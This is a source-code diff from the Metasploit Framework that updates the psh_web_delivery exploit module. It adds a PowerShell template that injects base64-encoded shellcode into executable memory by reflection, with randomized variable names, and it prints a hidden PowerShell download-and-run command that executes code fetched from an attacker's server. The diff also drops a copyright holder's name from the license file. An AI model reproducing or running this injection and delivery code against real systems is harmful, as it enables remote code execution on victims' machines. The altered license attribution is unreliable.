Update psh_web_delivery for reflection

LICENSE

@@ -15,8 +15,12 @@ License: BSD-3-clause
 # Last updated: 2013-Nov-04
 #
 
+Files: data/templates/to_mem_pshreflection.ps1.template
+Copyright: 2012, Matthew Graeber
+License: BSD-3-clause
+
 Files: data/john/*
-Copyright: 1996-2011 Solar Designer.
+Copyright: 1996-2011
 License: GPL-2
 
 Files: external/pcaprub/*

data/templates/scripts/to_mem_pshreflection.ps1.template

@@ -1,6 +1,3 @@
-#Added a tweaked by shellster
-#Originally taken from https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
-
 function %{func_get_proc_address} {
 	Param ($%{var_module}, $%{var_procedure})		
 	$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
@@ -21,7 +18,7 @@ function %{func_get_delegate_type} {
 	return $%{var_type_builder}.CreateType()
 }
 
-%{shellcode}
+[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
 		
 $%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, [math]::max(0x1000, $%{var_code}.Length), 0x40)
 $%{var_memset} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} msvcrt.dll memset), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32])))

lib/msf/util/exe.rb

@@ -914,15 +914,17 @@ require 'msf/core/exe/segment_injector'
     hash_sub[:var_rwx] 		= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_iter] 		= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_syscode] 		= Rex::Text.rand_text_alpha(rand(8)+8)
-
     hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code])
 
     return read_replace_script_template("to_mem_old.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
   end
-  
+
+  #
+  # Reflection technique prevents the temporary .cs file being created for the .NET compiler
+  # Tweaked by shellster
+  # Originally from PowerSploit
+  #
   def self.to_win32pe_psh_reflection(framework, code, opts={})
-    #Added a tweaked by shellster
-    #Originally taken from https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
     hash_sub = {}
     hash_sub[:func_get_proc_address] = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:func_get_delegate_type] = Rex::Text.rand_text_alpha(rand(8)+8)
@@ -935,7 +937,8 @@ require 'msf/core/exe/segment_injector'
     hash_sub[:var_type_builder] = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_buffer] = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_memset] = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code])
+
+    hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
 
     return read_replace_script_template("to_mem_pshreflection.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
   end

modules/exploits/windows/misc/psh_web_delivery.rb

@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     print_status("Delivering Payload")
-    data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
+    data = Msf::Util::EXE.to_win32pe_psh_reflection(framework, payload.encoded)
     send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
   end
 
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
     url = get_uri()
     download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
     print_status("Run the following command on the target machine:")
-    print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
+    print_line("powershell.exe -w hidden -nop -ep bypass -noe -c \"#{download_and_run}\"")
   end
 end